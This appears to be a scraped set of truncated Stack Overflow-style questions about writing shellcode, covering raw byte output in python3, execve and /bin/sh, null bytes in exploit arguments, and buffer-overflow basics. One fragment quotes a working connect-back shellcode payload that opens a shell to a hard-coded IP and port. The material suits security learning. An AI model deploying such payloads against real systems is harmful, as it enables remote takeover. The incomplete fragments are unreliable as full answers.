shellcode

I am writing shellcode exploits with python3. However, when I try and output some hex bytes. e.g. using the line - python3 -c 'print("\x8c")' | xxd The value in xxd is c28c , rather than the expected 8c This issue does not occur in python2. Your issue arises because Python 3 handles strings as Unicode, and print expects Unicode to encode some output for your terminal. Try the following to bypass this: python3 -c "import sys; sys.stdout.buffer.write(b'\x8c')" | xxd 来源： https://stackoverflow.com/questions/39424833/outputting-hex-values-in-python3

I'm learning the basics of computer security and I'm trying to execute some shellcode I've written. I followed the steps given here http://dl.packetstormsecurity.net/papers/shellcode/own-shellcode.pdf http://webcache.googleusercontent.com/search?q=cache:O3uJcNhsksAJ:dl.packetstormsecurity.net/papers/shellcode/own-shellcode.pdf+own+shellcode&cd=1&hl=nl&ct=clnk&gl=nl $ cat pause.s xor %eax,%eax mov $29,%al int $0x80 $ as -o pause.o pause.s $ ld -o pause pause.o ld: warning: cannot find entry symbol _start; defaulting to <<some address here>> $ ./pause ^C $ objdump -d ./pause pause: file format

I have to fill the parameters for: int execve(const char *filename, char *const argv[], char *const envp[]); If I execute this program: #include <unistd.h> int main() { char *args[2]; args[0] = "/bin/sh"; args[1] = NULL; execve(args[0], args, NULL); } the shell is spawned correctly as expected. My problem is that the shell is spawned correctly also if I pass a NULL as second parameter like that: #include <unistd.h> int main() { char *args[2]; args[0] = "/bin/sh"; args[1] = NULL; execve(args[0], NULL, NULL); } So what's the purpose to use the args vector (with the "/bin/sh" + NULL) as second

Here is a copy of code from shellstorm: #include <stdio.h> /* ipaddr 192.168.1.10 (c0a8010a) port 31337 (7a69) */ #define IPADDR "\xc0\xa8\x01\x0a" #define PORT "\x7a\x69" unsigned char code[] = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2" "\xb0\x66\xb3\x01\x51\x6a\x06\x6a" "\x01\x6a\x02\x89\xe1\xcd\x80\x89" "\xc6\xb0\x66\x31\xdb\xb3\x02\x68" IPADDR"\x66\x68"PORT"\x66\x53\xfe" "\xc3\x89\xe1\x6a\x10\x51\x56\x89" "\xe1\xcd\x80\x31\xc9\xb1\x03\xfe" "\xc9\xb0\x3f\xcd\x80\x75\xf8\x31" "\xc0\x52\x68\x6e\x2f\x73\x68\x68" "\x2f\x2f\x62\x69\x89\xe3\x52\x53" "\x89\xe1\x52\x89\xe2\xb0\x0b\xcd" "\x80"; main() {

I have a small program where I wish to pass shellcode as argument. In the shellcode, there is a necessity to pass \x00. I tried the following command: ./program `python -c 'print "\x01\x00\x00\x00\x9c\xd8\xff\xbf"'` But the \x00 doesn't get registered at all! The arguments passed to the program are "\x01\x9c\xff\xbf". I don't think it's a problem with python, but rather with the shell which passes the argument. I am using the bash shell. Now, how do I force the shell to pass the argument '\x00'? Thanks and Regards, Hrishikesh Murali If you check with wc , you'll find that the NUL character is

#include <stdio.h> int main(int argc, char** argv) { void (*p) (void); /* this obviously won't work, but what string could I put in here (if anything) to make this execute something meaningful? Does any OS allow instructions to be read from the stack rather than text area of the process image? */ char *c = "void f() { printf(\"Hello, world!\"); }"; p = ( void (*)() )c; p(); return 0; } Sort of, but not really, there is no eval() in c, like in many scripting languages. However, what you are describing is sort of like a Buffer Overflow exploit . Where, you use a string to write "code" (not c